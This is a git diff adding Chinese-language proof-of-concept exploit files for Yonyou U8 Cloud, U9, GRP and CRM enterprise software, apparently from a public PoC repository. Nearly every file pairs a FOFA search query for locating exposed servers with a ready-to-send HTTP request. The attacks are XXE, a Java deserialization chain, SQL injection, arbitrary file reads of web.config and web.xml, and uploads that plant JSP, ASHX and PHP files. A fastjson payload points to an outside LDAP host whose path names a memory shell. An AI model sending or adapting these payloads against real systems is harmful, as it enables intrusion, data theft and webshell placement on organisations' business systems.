+Content-Type: text/plain; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
--- a/用友OA/用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞.md
+++ b/用友OA/用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞.md
@@ -0,0 +1,25 @@
+## 用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞
+
+用友U8 Cloud smartweb2.showRPCLoadingTip.d 接口处存在XML实体，攻击者可通过该漏洞获取敏感文件信息，攻击者添加恶意内容，通过易受攻击的代码，就能够攻击包含缺陷的XML处理器
+
+## fofa
+
+```
+app="用友-U8-Cloud"
+```
+
+## poc
+
+```
+POST /hrss/dorado/smartweb2.showRPCLoadingTip.d?skin=default&__rpc=true&windows=1 HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+__type=updateData&__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=%3C%21DOCTYPE+z+%5B%3C%21ENTITY+test++SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%5D%3E%3Crpc+transaction%3D%221%22+method%3D%22resetPwd%22%3E%3Cdef%3E%3Cdataset+type%3D%22Custom%22+id%3D%22dsResetPwd%22%3E%3Cf+name%3D%22user%22%3E%3C%2Ff%3E%3C%2Fdataset%3E%3C%2Fdef%3E%3Cdata%3E%3Crs+dataset%3D%22dsResetPwd%22%3E%3Cr+id%3D%221%22+state%3D%22insert%22%3E%3Cn%3E%3Cv%3E1%3C%2Fv%3E%3C%2Fn%3E%3C%2Fr%3E%3C%2Frs%3E%3C%2Fdata%3E%3Cvps%3E%3Cp+name%3D%22__profileKeys%22%3E%26test%3B%3C%2Fp%3E%3C%2Fvps%3E%3C%2Frpc%3E
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406262216172.png)
--- a/用友OA/用友U8-Cloud接口FileManageServlet存在反序列漏洞.md
+++ b/用友OA/用友U8-Cloud接口FileManageServlet存在反序列漏洞.md
@@ -0,0 +1,31 @@
+## 用友U8-Cloud接口FileManageServlet存在反序列漏洞
+
+
+## fofa
+```
+app="用友-U8-Cloud"
+```
+
+
+## poc
+```
+POST /servlet/~uap/nc.impl.pub.filesystem.FileManageServlet HTTP/1.1
+Host: 192.168.127.145:8088
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=1.9
+Content-Type: application/x-www-form-urlencoded
+
+
+{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec(z\x97\x04\x02\x00\x01[\x00\riTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x05sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\tiConstantq\x00~\x00\x03xpvr\x00\x11java.lang.Runtime\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk{|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\x02t\x00\ngetRuntimeur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\tgetMethoduq\x00~\x00\x1b\x00\x00\x00\x02vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpvq\x00~\x00\x1bsq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02puq\x00~\x00\x18\x00\x00\x00\x00t\x00\x06invokeuq\x00~\x00\x1b\x00\x00\x00\x02vr\x00\x10java.lang.Object\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpvq\x00~\x00\x18sq\x00~\x00\x13ur\x00\x13[Ljava.lang.String;\xad\xd2V\xe7\xe9\x1d{G\x02\x00\x00xp\x00\x00\x00\x01t\x00\x04calct\x00\x04execuq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00 sq\x00~\x00\x0fsr\x00\x11java.lang.Integer\x12\xe2\xa0\xa4\xf7\x81\x878\x02\x00\x01I\x00\x05valuexr\x00\x10java.lang.Number\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00xp\x00\x00\x00\x01sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}
+```
+使用ysoserial生成payload 
+```
+java -jar ysoserial.jar CommonsCollections6 "calc" > 1.txt
+```
+
+使用yakit发包，成功弹出计算器
+
+![image](https://github.com/wy876/POC/assets/139549762/21dfbaab-7687-45b4-b171-722aad3e759b)
--- a/用友OA/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md
+++ b/用友OA/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md
@@ -0,0 +1,9 @@
+## 用友U8-Cloud接口FileServlet存在任意文件读取漏洞
+
+
+## poc
+```
+GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
+Host: url
+
+```
--- a/用友OA/用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞.md
+++ b/用友OA/用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞.md
--- a/用友OA/用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞.md
+++ b/用友OA/用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞
+
+用友U8 Cloud BusinessRefAction接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+title=="U8C"
+```
+
+## poc
+
+```java
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.web.reference.BusinessRefAction&method=getTaskRepTreeRef&taskId=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408102202711.png)
--- a/用友OA/用友U8-Cloud系统XChangeServlet接口存在XXE漏洞.md
+++ b/用友OA/用友U8-Cloud系统XChangeServlet接口存在XXE漏洞.md
@@ -0,0 +1,29 @@
+## 用友U8-Cloud系统XChangeServlet接口存在XXE漏洞
+
+用友U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。该系统/service/XChangeServlet接口存在XXE漏洞，攻击者可以在xml中构造恶意命令，会导致服务器数据泄露以及被远控。
+
+
+
+## fofa
+
+```
+app="用友-U8-Cloud"
+```
+
+
+
+## poc
+
+```
+POST /service/XChangeServlet HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Content-Length: 129
+Connection: close
+Content-Type: text/xml
+Accept-Encoding: gzip
+
+<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://jbiag2.dnslog.cn/mt">]><r><a>&xxe;</a ></r>
+```
+
+![image-20240521200556542](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405212005621.png)
--- a/用友OA/用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞.md
+++ b/用友OA/用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞
+
+用友U8 Cloud MeasQueryConditionFrameAction接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+app="用友-U8-Cloud"
+```
+
+## poc
+
+```yaml
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
+Host: 127.0.0.1:9001
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![用友U8CloudSQL注入](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407122050039.png)
--- a/用友OA/用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞.md
+++ b/用友OA/用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞.md
@@ -0,0 +1,28 @@
+## 用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞
+
+## fofa
+```
+"用友U8 Cloud"
+```
+![image](https://github.com/wy876/POC/assets/139549762/c39bc2dc-867f-451b-af53-3ea1093e9546)
+
+## poc
+```
+POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
+Accept-Encoding: gzip, deflate, br
+Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
+Connection: closeContent-Type: multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75
+Host:
+Upgrade-Insecure-Requests: 1
+Content-Length: 217
+
+--7b1db34fff56ef636e9a5cebcd6c9a75
+Content-Disposition: form-data; name="iconFile"; filename="info.jsp"
+Content-Type: application/octet-stream
+
+<% out.println("tteesstt1"); %>
+--7b1db34fff56ef636e9a5cebcd6c9a75--
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/2beed268-4f9f-4548-bdf9-a8a7f361f660)
--- a/RegisterServlet接口存在SQL注入漏洞.md
+++ b/RegisterServlet接口存在SQL注入漏洞.md
@@ -0,0 +1,38 @@
+## 用友U8-cloud RegisterServlet接口存在SQL注入漏洞
+U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。
+
+U8 cloud不同于传统的ERP，融合了交易、服务、管理于一体的整体解决方案。U8 cloud集中于企业内部管理管控，管理，规范、高效、协同、透明。通过云模式，低成本，快速部署，即租即用的帮助企业免除硬软件投入的快速搭建企业管理架构。通过云服务连接，业务模式、服务模式的经营创新。
+
+该系统RegisterServlet接口存在SQL注入漏洞，并且属于1day状态。
+
+## fofa
+```
+app="用友-U8-Cloud"
+```
+
+## poc
+发送下面的poc，响应包返回123456 的md5为存在漏洞
+```
+POST /servlet/RegisterServlet HTTP/1.1
+Host: ip:port
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+Connection: close
+Content-Length: 85
+Accept: */*
+Accept-Language: en
+Content-Type: application/x-www-form-urlencoded
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip
+
+usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
+```
+返回
+```
+HTTP/1.1 200 OK
+Connection: close
+Content-Length: 71Date: Mon, 13 Nov 2023 02:25:54 GMT
+Server: Apache-Coyote/1.1
+Set-Cookie: JSESSIONID=F66A9268A74114BADA7CB11346378B11.server;
+Path=/; HttpOnly
+Error:?? nvarchar ? 'e10adc3949ba59abbe56e057f20f883e' ??????? int ????
+```
--- a/用友OA/用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md
+++ b/用友OA/用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md
@@ -0,0 +1,17 @@
+## 用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞
+
+用友U8 Cloud nc.bs.sm.login2.RegisterServlet接口存在SQL注入，黑客可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
+
+资产测绘
+## fofa
+```
+app="用友-U8-Cloud"
+```
+
+## poc
+```
+GET /servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL--%20Jptd HTTP/1.1
+Host: 
+X-Forwarded-For: 127.0.0.1
+Cookie: JSESSIONID=D523370AE42E1D2363160250C914E62A.server
+```
--- a/用友OA/用友U8GRP-fastjson漏洞.md
+++ b/用友OA/用友U8GRP-fastjson漏洞.md
@@ -0,0 +1,24 @@
+## 用友U8GRP-fastjson
+
+
+## poc
+```
+POST /VerifyToken HTTP/1.1
+Host: xxx
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 322
+
+PARAM=eyJuYW1lIjp7IkB0eXBlIjoiamF2YS5sYW5nLkNsYXNzIiwidmFsIjoiY29tLnN1bi5yb3dzZXQuSmRiY1Jvd1NldEltcGwifSwieCI6eyJAdHlwZSI6ImNvbS5zdW4ucm93c2V0LkpkYmNSb3dTZXRJbXBsIiwiZGF0YVNvdXJjZU5hbWUiOiJsZGFwOi8veHh4eHg6MTM4OS9EZXNlcmlhbGl6YXRpb24vZmFzdGpzb24xL215dG9tY2F0bWVtZmlsdGVyc2hlbGwiLCJhdXRvQ29tbWl0Ijp0cnVlfX0=
+```
+
+base64内容
+```
+{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxxxx:1389/Deserialization/fastjson1/filtershell","autoCommit":true}}
+```
--- a/用友OA/用友U8_Cloud-base64存在SQL注入漏洞.md
+++ b/用友OA/用友U8_Cloud-base64存在SQL注入漏洞.md
@@ -0,0 +1,10 @@
+## 用友U8_Cloud-base64存在SQL注入漏洞
+
+
+## poc
+```
+GET /u8cloud/api/file/upload/base64 HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+system: -1' or 1=@@version--+
+```
--- a/用友OA/用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md
+++ b/用友OA/用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md
@@ -0,0 +1,16 @@
+# 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞
+
+## fofa
+```
+app="用友U8 Cloud"
+```
+
+## poc
+```
+POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery  HTTP/1.1
+host:127.0.0.1
+
+{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}
+```
+
+![19d957a16fb12f9edddbd99a2dbd081a](https://github.com/wy876/POC/assets/139549762/dfc8e10e-b1f8-41db-8dd2-e23c5c47b249)
--- a/用友OA/用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md
+++ b/用友OA/用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md
@@ -0,0 +1,17 @@
+## 用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞
+
+## fofa
+```
+app="用友-U8-Cloud"
+```
+
+## poc
+```
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method=&repID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
+Host: url
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: application/json
+Accept-Encoding: gzip
+Connection: close
+
+```
--- a/用友OA/用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞.md
+++ b/用友OA/用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞.md
@@ -0,0 +1,13 @@
+## 用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞
+
+
+## poc
+```
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
+Host: url
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: application/json
+Accept-Encoding: gzip
+Connection: close
+
+```
--- a/用友OA/用友U9-PatchFile.asmx接口存在任意文件上传漏洞.md
+++ b/用友OA/用友U9-PatchFile.asmx接口存在任意文件上传漏洞.md
@@ -0,0 +1,35 @@
+## 用友U9-PatchFile.asmx接口存在任意文件上传漏洞
+
+用友U9聚焦中型和中大型制造企业，全面支持业财税档一体化、设计制造一体化、计划执行一体化、营销服务一体化、项目制造一体化等数智制造场景，赋能组织变革和商业创新，融合产业互联网资源实现连接、共享、协同，助力制造企业高质量发展。
+
+## fofa
+```
+body="logo-u9.png"
+```
+
+## poc
+```
+POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host: 127.0.0.1
+Content-Type: text/xml; charset=utf-8
+SOAPAction: "http://tempuri.org/SaveFile"
+Content-Length: 880
+
+<?xml version="1.0" encoding="utf-8"?>
+ <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+   <SaveFile xmlns="http://tempuri.org/">
+    <binData>PCUgQCB3ZWJoYW5kbGVyIGxhbmd1YWdlPSJDIyIgY2xhc3M9IkF2ZXJhZ2VIYW5kbGVyIiAlPiAKdXNpbmcgU3lzdGVtOyAKdXNpbmcgU3lzdGVtLldlYjsgCgpwdWJsaWMgY2xhc3MgQXZlcmFnZUhhbmRsZXIgOiBJSHR0cEhhbmRsZXIgCnsgCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlIAogICAgeyAKICAgICAgICBnZXQgewogICAgICAgICAgICAgcmV0dXJuIHRydWU7IAogICAgICAgICAgICB9IAogICAgICAgIH0gCiAgICAgICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY3R4KSAKICAgICAgICB7IAogICAgICAgICAgICBjdHguUmVzcG9uc2UuV3JpdGUoImhlbGxvIik7IAogICAgICAgIH0gCiAgICB9</binData>
+    <path>./</path>
+    <fileName>testtest.ashx</fileName>
+   </SaveFile>
+  </soap:Body>
+ </soap:Envelope>
+```
+
+上传后的路径 
+`http://127.0.0.1/CS/Office/AutoUpdates/testtest.ashx`
--- a/用友OA/用友U9-UMWebService.asmx存在文件读取漏洞.md
+++ b/用友OA/用友U9-UMWebService.asmx存在文件读取漏洞.md
@@ -0,0 +1,22 @@
+## 用友U9-UMWebService.asmx存在文件读取漏洞
+
+## poc
+```
+POST /u9/OnLine/UMWebService.asmx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36
+Connection: close
+Content-Length: 381
+Content-Type: text/xml; charset=utf-8
+SOAPAction: "http://tempuri.org/GetLogContent"
+Accept-Encoding: gzip
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetLogContent xmlns="http://tempuri.org/">
+      <fileName>../web.config</fileName>
+    </GetLogContent>
+  </soap:Body>
+</soap:Envelope>
+```
--- a/用友OA/用友U9系统DoQuery接口存在SQL注入.md
+++ b/用友OA/用友U9系统DoQuery接口存在SQL注入.md
@@ -0,0 +1,80 @@
+# 用友U9系统DoQuery接口存在SQL注入
+
+用友u9 `DoQuery` 接口存在SQL注入，攻击者可通过该漏洞获取敏感信息。
+
+## fofa
+
+```yaml
+body="logo-u9.png"
+```
+
+## poc
+
+**第一步：获取code**
+
+```yaml
+POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: 309
+SOAPAction: "http://tempuri.org/GetEnterprise"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetEnterprise xmlns="http://tempuri.org/" />
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20240730093905712](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407300939798.png)
+
+**第二步：获取token**
+
+```yaml
+
+POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: 345
+SOAPAction: "http://tempuri.org/GetToken"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetToken xmlns="http://tempuri.org/">
+      <endId>000</endId>
+    </GetToken>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20240730093936752](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407300939822.png)
+
+**第三步：SQL注入，token处填入上面获取的**
+
+```yaml
+POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: 345
+SOAPAction: "http://tempuri.org/DoQuery"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <DoQuery xmlns="http://tempuri.org/">
+      <token></token>
+	  <command>select 1;waitfor delay '0:0:1' --</command>
+    </DoQuery>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20240730094018683](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407300941078.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/FTbXyr8U5pW8RGtgurFV4A
--- a/用友OA/用友Ufida-ELTextFile.load.d任意文件读取漏洞.md
+++ b/用友OA/用友Ufida-ELTextFile.load.d任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+## 用友Ufida-ELTextFile.load.d任意文件读取漏洞
+
+用友Ufida /hrss/ELTextFile.load.d 存在任意文件读取漏洞
+
+## fofa
+
+```
+icon_hash="-628229493"
+```
+
+## poc
+
+```
+GET /hrss/ELTextFile.load.d?src=WEB-INF/web.xml HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
--- a/用友OA/用友crm-swfupload接口存在任意文件上传漏洞.md
+++ b/用友OA/用友crm-swfupload接口存在任意文件上传漏洞.md
@@ -0,0 +1,32 @@
+## 用友crm-swfupload接口存在任意文件上传漏洞
+
+## fofa
+```
+body="用友U8CRM"
+```
+
+## poc
+```
+POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------269520967239406871642430066855
+Content-Length: 355
+
+-----------------------------269520967239406871642430066855
+Content-Disposition: form-data; name="file"; filename="%s.php "
+Content-Type: application/octet-stream
+
+<?phpinfo();sleep(8);unlink(__FILE__);?>
+-----------------------------269520967239406871642430066855
+Content-Disposition: form-data; name="upload"
+
+upload
+-----------------------------269520967239406871642430066855--
+```
+![image](https://github.com/wy876/POC/assets/139549762/dc0c03e9-ad57-4baa-bc90-48e9222bccba)
+
+文件路径：`http://127.0.0.1/tmpfile/{{path}}.tmp.php`
--- a/用友OA/用友crm客户关系管理help.php存在任意文件读取漏洞.md
+++ b/用友OA/用友crm客户关系管理help.php存在任意文件读取漏洞.md
@@ -0,0 +1,19 @@
+# 用友crm客户关系管理help.php存在任意文件读取漏洞
+
+
+
+## fofa
+
+```yaml
+body="用友 U8CRM"
+```
+
+## poc
+
+```java
+GET /pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+```
+
--- a/Show More
+++ b/Show More